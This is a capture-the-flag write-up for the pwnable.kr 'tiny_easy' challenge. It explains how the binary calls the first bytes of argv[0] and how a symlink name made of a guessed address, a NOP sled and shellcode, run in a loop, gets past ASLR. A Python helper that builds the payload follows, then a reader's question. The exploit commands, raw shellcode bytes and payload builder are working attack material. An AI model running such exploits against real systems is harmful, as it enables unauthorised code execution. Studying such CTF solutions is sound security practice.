Running the program just crashes. Load it in gdb-peda, break at the entry point and step through the first few instructions:
0x8048054: pop eax
0x8048055: pop edx
0x8048056: mov edx,DWORD PTR [edx]
0x8048058: call edx
At process entry the stack holds argc followed by the argv pointers, so pop eax takes argc, pop edx takes the argv[0] pointer, mov edx,DWORD PTR [edx] loads the first four bytes of the argv[0] string, and call edx jumps to that value. So if the program is run as /home/c/ctf/tiny_easy, the address being called is EDX = 0x6d6f682f, the little-endian encoding of '/hom'.
Try exec -a AAAA ./tiny_easy to set argv[0] ourselves: the program calls 0x41414141 and crashes, and because exec replaced the shell process with it, the shell exits and the ssh connection is lost. We could append & to the command so it runs in a subshell, then use fg to switch to it, but that is too inconvenient.
A symbolic link is simpler. Link the name we want to the program and run it through the link: argv[0] becomes the link name, while the real binary still runs with its own permissions.
Check the protection:
➜ ctf ./checksec --file tiny_easy
RELRO      STACK CANARY      NX          PIE     RPATH     RUNPATH     FORTIFY  FORTIFIED  FORTIFY-able  FILE
No RELRO   No canary found   NX enabled  No PIE  No RPATH  No RUNPATH  No       0          0             tiny_easy
And the system ASLR is enabled.
The NX column is misleading here: checksec derives it from the PT_GNU_STACK program header, and this hand-written binary has no such header, so on 32-bit Linux the kernel gives it an executable stack by default. There is also no linked library to return into, so ROP is not an option. The plan is therefore to jump into data the kernel already places on the stack for us, namely the environment and the program arguments, and put shellcode there.
We construct a link name of the form [address][NOP]*n[shellcode]: the first four bytes are the address that gets called, and with ASLR on they are only a guess at where argv[0] sits on the stack, so we run the link repeatedly until the guess lands in the NOP sled and slides into the shellcode. The name is a file name, so none of its bytes may be NUL or '/'.
mkdir /tmp/ihctiny
cd /tmp/ihctiny
ln -s /home/tiny_easy/tiny_easy `python -c "print '\x88\x88\x88\xff'+'\x90'*140+'\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3'"`
while true; do ./`python -c "print '\x88\x88\x88\xff'+'\x90'*140+'\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3'"`; done
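The loop above relies on Python 2, where print of a str emits the raw bytes. The following Python 3 helper is an added example, not code from the original writeup or from pwnable.kr: it decodes the call target from argv[0] the way the four instructions above do, assembles the [address][NOP]*n[shellcode] name, rejects any byte a Linux file name cannot hold (NUL and '/', which is why the guessed address itself must contain no 0x00 byte), and checks whether a guess would land in the sled for an assumed argv[0] location. The shellcode bytes are the ones from the writeup's command line; the addresses used in the usage example are constructed for illustration.

```python
import struct
import sys

# Shellcode taken from the writeup's link name: 39 bytes, free of NUL and '/'.
SHELLCODE = (b"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4"
             b"\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c"
             b"\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3")

NAME_MAX = 255  # longest path component Linux accepts


def call_target(argv0: bytes) -> int:
    """Address that 'pop edx; mov edx,[edx]; call edx' ends up calling.

    The first four bytes of the argv[0] string are read as a little-endian
    32-bit value, so b"/home/..." becomes 0x6d6f682f ('/hom').
    """
    if len(argv0) < 4:
        raise ValueError("argv[0] shorter than 4 bytes; the load would read past it")
    return struct.unpack("<I", argv0[:4])[0]


def check_filename(name: bytes) -> None:
    """Reject anything that cannot be a Linux file name (and so not a link name)."""
    if b"\x00" in name:
        raise ValueError("NUL byte in name: execve would cut argv[0] short there")
    if b"/" in name:
        raise ValueError("'/' in name: it is a path separator, not a file-name byte")
    if len(name) > NAME_MAX:
        raise ValueError("name longer than NAME_MAX (%d)" % NAME_MAX)


def build_payload(guess: int, nop_count: int, shellcode: bytes = SHELLCODE) -> bytes:
    """Return [address][NOP]*nop_count[shellcode] as the bytes of the link name."""
    payload = struct.pack("<I", guess) + b"\x90" * nop_count + shellcode
    check_filename(payload)
    return payload


def sled_hits(guess: int, argv0_addr: int, nop_count: int) -> bool:
    """True if 'guess' lands on the NOP sled (or exactly at the shellcode).

    argv0_addr is the assumed address of the argv[0] string; the sled starts
    4 bytes in, right after the address field, and the shellcode follows it.
    """
    sled_start = argv0_addr + 4
    shellcode_start = sled_start + nop_count
    return sled_start <= guess <= shellcode_start


if __name__ == "__main__":
    # Same guess and sled length as the writeup; write raw bytes so the output
    # can be used as a link name, e.g.
    #   ln -s /path/to/tiny_easy "$(python3 build_name.py)"
    sys.stdout.buffer.write(build_payload(0xFF888888, 140))
```

Note that under 32-bit ASLR the stack top moves by multiples of a page, so a 140-byte sled covers only a small slice of the possible argv[0] positions; that is why the writeup wraps the run in a while loop rather than expecting the first attempt to land.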
Reference: http://www.secbox.cn/hacker/ctf/5547.html
I have a small doubt: in [address][NOP]*n[shellcode], how did you determine which value of address is to be used?